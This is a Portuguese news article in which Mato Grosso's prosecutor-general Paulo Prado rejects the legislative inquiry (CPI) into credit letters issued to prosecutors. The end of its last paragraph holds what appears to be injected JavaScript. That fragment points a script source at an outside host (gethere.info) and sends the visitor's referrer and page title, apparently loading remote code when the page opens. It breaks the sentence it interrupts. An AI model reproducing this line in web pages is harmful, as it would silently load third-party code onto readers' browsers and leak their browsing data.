Capa / Cidades / Prado rompe silêncio e fala sobre abertura da CPI do MPE na Assembleia; “deram luz a um condenado”

Prado rompe silêncio e fala sobre abertura da CPI do MPE na Assembleia; “deram luz a um condenado”

paulo-prado-mpeHipernoticias

O procurador-geral de Justiça do Ministério Público de Mato Grosso (MPE), Paulo Prado, classifica a instauração da Comissão de Parlamentar de Inquérito (CPI) das “Cartas de Créditos” como uma tentativa de intimidação e represália à atuação autônoma e independente dos membros da Instituição.

Nesta segunda-feira (30), após a publicação oficial da portaria que dispõe sobre o objeto da investigação, o procurador-geral de Justiça em Mato Grosso rompeu o silêncio e voltou a enfatizar que está seguro quanto aos valores e legalidades das cartas de créditos emitidas a procuradores e promotores de Justiça. Afirmou ainda estar à disposição da Assembleia Legislativa (ALMT) para qualquer tipo de esclarecimento.

“As nossas cartas de crédito já foram alvos de exaustiva investigação pelo Controle Externo do Tribunal de Contas do Estado por duas vezes, sendo que no último julgamento foram aprovadas por unanimidade, conforme publicado no Diário Oficial do Estado (Edição 622, pág 8 – Processo 14066-0/2014, acórdão 1713/2015/TP). A matéria também passou pela análise do Controle Interno do Ministério Público, da Procuradoria Geral do Estado e do Conselho Nacional do Ministério Público, com a conclusão de que não há indícios de fraude apto a instauração de procedimento de controle”, ressaltou Prado.

Os 23 deputados da Casa assinaram o requerimento para abertura da Comissão, apenas Zeca Viana (PDT) não assinou o documento. Para o procurador-geral de Justiça, o fato da CPI ter vindo à tona após declarações do ex-secretário de Fazenda Éder Moraes, já condenado pela Justiça Federal e denunciado pelo MPE, causa estranheza.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top